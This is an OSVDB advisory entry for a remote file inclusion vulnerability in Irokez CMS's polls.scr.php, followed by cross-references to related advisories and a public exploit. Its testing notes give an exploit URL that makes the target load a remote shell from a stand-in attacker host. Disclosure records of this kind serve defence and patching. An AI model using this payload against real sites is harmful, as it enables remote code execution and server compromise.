Irokez CMS scripts/polls.scr.php GLOBALS[PTH][classes] Variable Remote File Inclusion

2006-12-25T04:18:50
ID OSVDB:32460
Type osvdb
Reporter OSVDB
Modified 2006-12-25T04:18:50

Description

Manual Testing Notes

http://[target]/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://[attacker]/shell.php?

References:

Secunia Advisory ID:23497 Related OSVDB ID: 32469 Related OSVDB ID: 32459 Related OSVDB ID: 32462 Related OSVDB ID: 32464 Related OSVDB ID: 32465 Related OSVDB ID: 32457 Related OSVDB ID: 32458 Related OSVDB ID: 32461 Related OSVDB ID: 32463 Related OSVDB ID: 32466 Related OSVDB ID: 32467 Related OSVDB ID: 32468 Generic Exploit URL: http://www.milw0rm.com/exploits/3007 FrSIRT Advisory: ADV-2006-5178 CVE-2006-6771 Bugtraq ID: 21769